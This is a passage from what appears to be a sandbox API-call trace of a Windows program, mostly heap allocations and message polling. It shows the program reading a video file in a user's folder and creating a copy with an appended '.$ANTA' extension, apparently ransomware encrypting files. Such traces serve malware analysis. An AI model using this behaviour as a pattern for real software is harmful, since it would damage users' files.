dwFlags=0x0, lpMem=0x43cad90 | out: hHeap=0x1780000) returned 1 [0104.752] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caee0 | out: hHeap=0x1780000) returned 1 [0104.752] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a9188 | out: hHeap=0x1780000) returned 1 [0104.752] PeekMessageW (in: lpMsg=0x144e44c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e44c) returned 0 [0104.752] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a20 [0104.752] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0148 [0104.752] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb048 [0104.752] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a70 [0104.752] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a70 | out: hHeap=0x1780000) returned 1 [0104.752] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb018 [0104.752] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2b20 [0104.752] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b20 | out: hHeap=0x1780000) returned 1 [0104.752] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cae50 [0104.752] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a50 [0104.752] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a50 | out: hHeap=0x1780000) returned 1 [0104.752] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb048 | out: hHeap=0x1780000) returned 1 [0104.752] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb018 | out: hHeap=0x1780000) returned 1 [0104.752] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae50 | out: hHeap=0x1780000) returned 1 [0104.752] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0148 | out: hHeap=0x1780000) returned 1 [0104.752] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a20 | out: hHeap=0x1780000) returned 1 [0104.752] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8cc0 | out: hHeap=0x1780000) returned 1 [0104.752] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb000 | out: hHeap=0x1780000) returned 1 [0104.752] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cada8 | out: hHeap=0x1780000) returned 1 [0104.752] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae08 | out: hHeap=0x1780000) returned 1 [0104.752] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae38 | out: hHeap=0x1780000) returned 1 [0104.753] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb240 | out: hHeap=0x1780000) returned 1 [0104.753] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb270 | out: hHeap=0x1780000) returned 1 [0104.753] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796e08 | out: hHeap=0x1780000) returned 1 [0104.753] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ea958 | out: hHeap=0x1780000) returned 1 [0104.753] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a10 | out: hHeap=0x1780000) returned 1 [0104.753] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad30 | out: hHeap=0x1780000) returned 1 [0104.753] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cacd0 | out: hHeap=0x1780000) returned 1 [0104.753] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b00 | out: hHeap=0x1780000) returned 1 [0104.753] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0198 | out: hHeap=0x1780000) returned 1 [0104.753] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab08 | out: hHeap=0x1780000) returned 1 [0104.753] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad60 | out: hHeap=0x1780000) returned 1 [0104.753] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2960 | out: hHeap=0x1780000) returned 1 [0104.753] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cff18 | out: hHeap=0x1780000) returned 1 [0104.753] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cace8 | out: hHeap=0x1780000) returned 1 [0104.753] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cff90 | out: hHeap=0x1780000) returned 1 [0104.753] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a90 | out: hHeap=0x1780000) returned 1 [0104.753] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfe28 | out: hHeap=0x1780000) returned 1 [0104.753] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab98 | out: hHeap=0x1780000) returned 1 [0104.753] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab80 | out: hHeap=0x1780000) returned 1 [0104.753] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a60 | out: hHeap=0x1780000) returned 1 [0104.753] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0170 | out: hHeap=0x1780000) returned 1 [0104.753] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caad8 | out: hHeap=0x1780000) returned 1 [0104.753] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0058 | out: hHeap=0x1780000) returned 1 [0104.753] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29e0 | out: hHeap=0x1780000) returned 1 [0104.753] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0008 | out: hHeap=0x1780000) returned 1 [0104.753] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb078 | out: hHeap=0x1780000) returned 1 [0104.753] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a30 | out: hHeap=0x1780000) returned 1 [0104.753] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e2c08 | out: hHeap=0x1780000) returned 1 [0104.753] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a00 | out: hHeap=0x1780000) returned 1 [0104.753] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e2bd8 | out: hHeap=0x1780000) returned 1 [0104.753] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796d88 | out: hHeap=0x1780000) returned 1 [0104.753] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab68 | out: hHeap=0x1780000) returned 1 [0104.753] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac88 | out: hHeap=0x1780000) returned 1 [0104.753] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29f0 | out: hHeap=0x1780000) returned 1 [0104.754] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfe00 | out: hHeap=0x1780000) returned 1 [0104.754] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabf8 | out: hHeap=0x1780000) returned 1 [0104.754] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac58 | out: hHeap=0x1780000) returned 1 [0104.754] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d00a8 | out: hHeap=0x1780000) returned 1 [0104.754] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2970 | out: hHeap=0x1780000) returned 1 [0104.754] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cffe0 | out: hHeap=0x1780000) returned 1 [0104.754] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caac0 | out: hHeap=0x1780000) returned 1 [0104.754] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d00f8 | out: hHeap=0x1780000) returned 1 [0104.754] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2950 | out: hHeap=0x1780000) returned 1 [0104.754] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d00d0 | out: hHeap=0x1780000) returned 1 [0104.754] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caca0 | out: hHeap=0x1780000) returned 1 [0104.754] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabb0 | out: hHeap=0x1780000) returned 1 [0104.754] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ab0 | out: hHeap=0x1780000) returned 1 [0104.754] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0120 | out: hHeap=0x1780000) returned 1 [0104.754] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac28 | out: hHeap=0x1780000) returned 1 [0104.754] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a40 | out: hHeap=0x1780000) returned 1 [0104.754] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29c0 | out: hHeap=0x1780000) returned 1 [0104.754] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfec8 | out: hHeap=0x1780000) returned 1 [0104.754] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac10 | out: hHeap=0x1780000) returned 1 [0104.754] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac40 | out: hHeap=0x1780000) returned 1 [0104.754] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac70 | out: hHeap=0x1780000) returned 1 [0104.754] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfd88 | out: hHeap=0x1780000) returned 1 [0104.754] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2940 | out: hHeap=0x1780000) returned 1 [0104.754] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4a8 | out: hHeap=0x1780000) returned 1 [0104.754] PeekMessageW (in: lpMsg=0x144e97c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e97c) returned 0 [0104.754] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a00 [0104.754] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20a) returned 0x43e95f0 [0104.754] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e29e0 [0104.754] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e95f0 | out: hHeap=0x1780000) returned 1 [0104.754] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29e0 | out: hHeap=0x1780000) returned 1 [0104.754] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a00 | out: hHeap=0x1780000) returned 1 [0104.754] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac040 [0104.754] PeekMessageW (in: lpMsg=0x144e97c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e97c) returned 0 [0104.755] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac040 | out: hHeap=0x1780000) returned 1 [0104.755] PeekMessageW (in: lpMsg=0x144e97c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e97c) returned 0 [0104.755] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41abfc0 | out: hHeap=0x1780000) returned 1 [0104.755] PeekMessageW (in: lpMsg=0x144e97c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e97c) returned 0 [0104.755] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a00 [0104.755] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cff90 [0104.755] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4a8 [0104.755] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a50 [0104.755] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad48 [0104.755] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a50 | out: hHeap=0x1780000) returned 1 [0104.755] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab50 [0104.755] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2990 [0104.755] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2990 | out: hHeap=0x1780000) returned 1 [0104.755] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41abfc0 [0104.755] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10000) returned 0x43ed3b0 [0104.755] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab38 [0104.755] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2ac0 [0104.755] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Videos\\KW4s-- cgXZEZC\\T H0jeo_wwrX\\pNrmbcA\\yyOweBt9y9iUOOrJX\\38VodG.mp4" (normalized: "c:\\users\\fd1hvy\\videos\\kw4s-- cgxzezc\\t h0jeo_wwrx\\pnrmbca\\yyowebt9y9iuoorjx\\38vodg.mp4"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x298 [0104.755] SetFilePointerEx (in: hFile=0x298, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0104.755] SetFilePointerEx (in: hFile=0x298, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x144e550 | out: lpNewFilePointer=0x0) returned 1 [0104.755] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfec8 [0104.756] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab80 [0104.756] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e29e0 [0104.756] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad48 | out: hHeap=0x1780000) returned 1 [0104.756] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4a8 | out: hHeap=0x1780000) returned 1 [0104.756] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab50 | out: hHeap=0x1780000) returned 1 [0104.756] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cff90 | out: hHeap=0x1780000) returned 1 [0104.756] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a00 | out: hHeap=0x1780000) returned 1 [0104.756] PeekMessageW (in: lpMsg=0x144e97c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e97c) returned 0 [0104.756] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e29f0 [0104.756] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a50 [0104.756] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2940 [0104.756] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796e08 [0104.756] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2940 | out: hHeap=0x1780000) returned 1 [0104.756] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796e08 | out: hHeap=0x1780000) returned 1 [0104.756] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a50 | out: hHeap=0x1780000) returned 1 [0104.756] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29f0 | out: hHeap=0x1780000) returned 1 [0104.756] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac040 [0104.756] PeekMessageW (in: lpMsg=0x144e97c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e97c) returned 0 [0104.756] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac040 | out: hHeap=0x1780000) returned 1 [0104.756] PeekMessageW (in: lpMsg=0x144e97c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e97c) returned 0 [0104.756] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a00 [0104.756] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d00a8 [0104.756] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caaf0 [0104.756] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e29c0 [0104.756] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cabe0 [0104.756] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29c0 | out: hHeap=0x1780000) returned 1 [0104.756] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab50 [0104.756] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2b20 [0104.756] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2ad0 [0104.757] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796e88 [0104.757] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796e88 | out: hHeap=0x1780000) returned 1 [0104.757] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ad0 | out: hHeap=0x1780000) returned 1 [0104.757] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b20 | out: hHeap=0x1780000) returned 1 [0104.757] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad30 [0104.757] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e29f0 [0104.757] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad48 [0105.128] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a50 [0105.128] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab08 [0105.128] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e29c0 [0105.128] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cabc8 [0105.128] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a10 [0105.128] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac40 [0105.129] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2970 [0105.129] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad60 [0105.129] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a90 [0105.129] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac40 | out: hHeap=0x1780000) returned 1 [0105.129] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391a10 [0105.129] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a60 [0105.129] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc0) returned 0x43eb950 [0105.129] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabc8 | out: hHeap=0x1780000) returned 1 [0105.129] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xa0) returned 0x40a86d0 [0105.129] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad48 | out: hHeap=0x1780000) returned 1 [0105.129] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xa0) returned 0x40a7518 [0105.129] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43eb950 | out: hHeap=0x1780000) returned 1 [0105.129] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a60 | out: hHeap=0x1780000) returned 1 [0105.129] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad60 | out: hHeap=0x1780000) returned 1 [0105.129] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a90 | out: hHeap=0x1780000) returned 1 [0105.129] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391a10 | out: hHeap=0x1780000) returned 1 [0105.129] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2970 | out: hHeap=0x1780000) returned 1 [0105.129] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x40a86d0 | out: hHeap=0x1780000) returned 1 [0105.129] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a10 | out: hHeap=0x1780000) returned 1 [0105.129] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab08 | out: hHeap=0x1780000) returned 1 [0105.129] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29c0 | out: hHeap=0x1780000) returned 1 [0105.129] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a90 [0105.129] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xa0) returned 0x40a7e48 [0105.129] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Videos\\KW4s-- cgXZEZC\\T H0jeo_wwrX\\pNrmbcA\\yyOweBt9y9iUOOrJX\\" (normalized: "c:\\users\\fd1hvy\\videos\\kw4s-- cgxzezc\\t h0jeo_wwrx\\pnrmbca\\yyowebt9y9iuoorjx")) returned 0x10 [0105.131] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x40a7e48 | out: hHeap=0x1780000) returned 1 [0105.131] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a90 | out: hHeap=0x1780000) returned 1 [0105.131] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x40a7518 | out: hHeap=0x1780000) returned 1 [0105.131] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a50 | out: hHeap=0x1780000) returned 1 [0105.131] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad30 | out: hHeap=0x1780000) returned 1 [0105.131] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29f0 | out: hHeap=0x1780000) returned 1 [0105.131] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac040 [0105.132] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10000) returned 0x4506008 [0105.132] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad30 [0105.132] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2990 [0105.132] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Videos\\KW4s-- cgXZEZC\\T H0jeo_wwrX\\pNrmbcA\\yyOweBt9y9iUOOrJX\\38VodG.mp4.$ANTA" (normalized: "c:\\users\\fd1hvy\\videos\\kw4s-- cgxzezc\\t h0jeo_wwrx\\pnrmbca\\yyowebt9y9iuoorjx\\38vodg.mp4.$anta"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x258 [0105.134] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0058 [0105.134] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cabf8 [0105.134] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a90 [0105.135] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabe0 | out: hHeap=0x1780000) returned 1 [0105.135] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caaf0 | out: hHeap=0x1780000) returned 1 [0105.135] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab50 | out: hHeap=0x1780000) returned 1 [0105.135] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d00a8 | out: hHeap=0x1780000) returned 1 [0105.135] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a00 | out: hHeap=0x1780000) returned 1 [0105.135] PeekMessageW (in: lpMsg=0x144e97c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e97c) returned 1 [0105.204] TranslateMessage (lpMsg=0x144e97c) returned 0 [0105.204] DispatchMessageW (lpMsg=0x144e97c) returned 0x0 [0105.204] KillTimer (hWnd=0x502d2, uIDEvent=0x1) returned 1 [0105.204] SetTimer (hWnd=0x502d2, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0105.204] PeekMessageW (in: lpMsg=0x144e97c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e97c) returned 0 [0105.204] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2930 [0105.204] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2940 [0105.204] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e29f0 [0105.204] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796e88 [0105.204] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29f0 | out: hHeap=0x1780000) returned 1 [0105.204] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796e88 | out: hHeap=0x1780000) returned 1 [0105.204] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2940 | out: hHeap=0x1780000) returned 1 [0105.204] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2930 | out: hHeap=0x1780000) returned 1 [0105.204] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac180 [0105.204] PeekMessageW (in: lpMsg=0x144e97c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e97c) returned 0 [0105.205] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac180 | out: hHeap=0x1780000) returned 1 [0105.205] PeekMessageW (in: lpMsg=0x144e97c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e97c) returned 0 [0105.205] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac180 [0105.205] PeekMessageW (in: lpMsg=0x144e97c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e97c) returned 0 [0105.205] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2960 [0105.205] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cff18 [0105.205] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac28 [0105.205] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e29f0 [0105.205] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29f0 | out: hHeap=0x1780000) returned 1 [0105.205] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab98 [0105.205] RtlAllocateHeap 